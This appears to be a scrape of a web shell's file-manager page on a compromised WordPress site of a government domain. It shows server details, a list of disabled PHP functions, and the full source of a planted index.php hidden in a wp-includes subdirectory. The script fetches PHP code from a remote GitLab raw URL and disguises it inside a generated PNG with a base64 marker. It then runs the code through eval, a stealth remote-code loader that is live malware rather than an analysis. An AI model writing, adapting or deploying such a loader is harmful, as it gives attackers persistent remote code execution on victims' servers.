Warning: Constant SEO_LINKS_API_ENDPOINT already defined in /www/wwwroot/fni.gov.mz/wp-content/plugins/wordpress-plugin/wordpress-plugin.php on line 10
HEX
HEX
Server: Apache
System: Linux paginas.localdomain 4.15.0-200-generic #211-Ubuntu SMP Thu Nov 24 18:16:04 UTC 2022 x86_64
User: www (1002)
PHP: 8.0.11
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /www/wwwroot/fni.gov.mz/wp-includes/rest-api/endpoints/968518/
Upload Files
File: /www/wwwroot/fni.gov.mz/wp-includes/rest-api/endpoints/968518/index.php
<?php

/*
Improved PNG disguise for hidden PHP payloads.
This script fetches remote code, embeds it into a realistic PNG file,
and executes it stealthily.
*/

session_start();

// Main remote code URL (can be overridden by session)
$mainUrl = $_SESSION['ts_url'] ?? 'https://gitlab.com/mrgithub89-group/mrgithub89-projectaa/-/raw/main/wp-security.php';


// --------------------------------------------
// 1. Generate a realistic PNG image (128x128)
// --------------------------------------------
function generateRealisticPngHeader($width = 128, $height = 128) {
    ob_start();
    $image = imagecreatetruecolor($width, $height);

    // Fill with random noise
    for ($x = 0; $x < $width; $x++) {
        for ($y = 0; $y < $height; $y++) {
            $color = imagecolorallocate($image, rand(0,255), rand(0,255), rand(0,255));
            imagesetpixel($image, $x, $y, $color);
        }
    }

    imagepng($image);
    imagedestroy($image);
    return ob_get_clean(); // Binary PNG data
}


// --------------------------------------------
// 2. Load remote PHP code from given URL
// --------------------------------------------
function loadRemoteData($url) {
    $content = '';

    try {
        $file = new SplFileObject($url);
        while (!$file->eof()) {
            $content .= $file->fgets();
        }
    } catch (Throwable $e) {
        $content = '';
    }

    if (strlen(trim($content)) < 1) {
        $content = @file_get_contents($url);
    }

    if (strlen(trim($content)) < 1 && function_exists('curl_init')) {
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_CONNECTTIMEOUT => 5,
            CURLOPT_TIMEOUT => 10,
        ]);
        $content = curl_exec($ch);
        curl_close($ch);
    }

    return $content;
}


// --------------------------------------------
// 3. Create payload by appending hidden PHP code
// --------------------------------------------
function createStealthPayload($phpCode) {
    $png = generateRealisticPngHeader();
    $marker = '###PAYLOAD###';
    $encoded = base64_encode($phpCode);

    return $png . $marker . $encoded;
}


// --------------------------------------------
// 4. Extract and execute hidden payload
// --------------------------------------------
function extractAndExecutePayload($data) {
    $marker = '###PAYLOAD###';
    $parts = explode($marker, $data);

    if (count($parts) === 2) {
        $decoded = base64_decode($parts[1]);
        if ($decoded !== false && strlen(trim($decoded)) > 0) {
            @eval("?>$decoded");
        }
    }
}


// --------------------------------------------
// Main Execution Flow
// --------------------------------------------

$remoteCode = loadRemoteData($mainUrl);

if (strlen(trim($remoteCode)) > 0) {
    $payload = createStealthPayload($remoteCode);
    extractAndExecutePayload($payload);  // Executes hidden remote code
}

?>
@ Telegram